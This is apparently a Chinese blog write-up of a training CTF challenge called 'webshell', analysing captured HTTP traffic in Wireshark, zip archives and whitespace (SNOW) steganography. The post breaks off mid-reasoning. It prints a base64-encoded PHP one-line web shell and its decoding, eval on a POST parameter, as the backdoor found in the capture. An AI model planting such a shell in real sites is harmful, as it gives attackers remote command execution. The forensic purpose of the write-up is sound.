引言
公司内部培训的一道题目,比较有意思,主要是复习一下空白密文的解码思路,算是脑洞的一种;流量取证的常规做法,还有AES的一段往事......
题目
┌───────────────────────────────────────────────────┐
│ webshell │
│ 200 │
│ 糟糕,服务器存在后门,遭到了黑客入侵。 │
│ │
└───────────────────────────────────────────────────┘
ps:考虑到某公司的不分享精神或许会有版权之类的争端,文件的解密需要你ctf一下,哈哈!
Writeup(WP)
废话不多说,咱们开整:
- 流量取证肯定需要wireshark,打开后先来个协议分级:
- 结合题目名称,很显然需要重点关注http,不过一眼望去都是404,那我们就先看看200的吧:
- 发现了目标:she1l.php,那就搜搜看:
- 大厨解码一下,得到k3y文件,就是一个zip压缩包:
- 根据提示需要找到服务端CMS本来的后门,再次搜索she1l.php,找上传的后门,文件上传肯定是POST:http.request.method==POST
PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==解码为<?php eval($_POST['cmd']);?> - 使用密码moddofun.php解压,得到flag文件,又是一个压缩包,解压得到文件snake:
- snake最先想到的是python,以为是pyc反编译,尝试了增加了几个常规版本的魔术数,无果!发现压缩包的注释:
- 空白密文,首先想到雪花隐写,将密文放入1.txt
>snow -C 1.txt
n0sasssyisidWarning: residual of 3 bits not uncompressed
>java -jar jsnow.jar -C 1.txt
Warning: residual of 3 bits not uncompressed.
n0sasssyisid
此时,想到了AES曾经的备选算法serpent(也有蛇
标签:取证,AES,攻击,解码,差分,密钥,密文 From: https://www.cnblogs.com/folio/p/18196365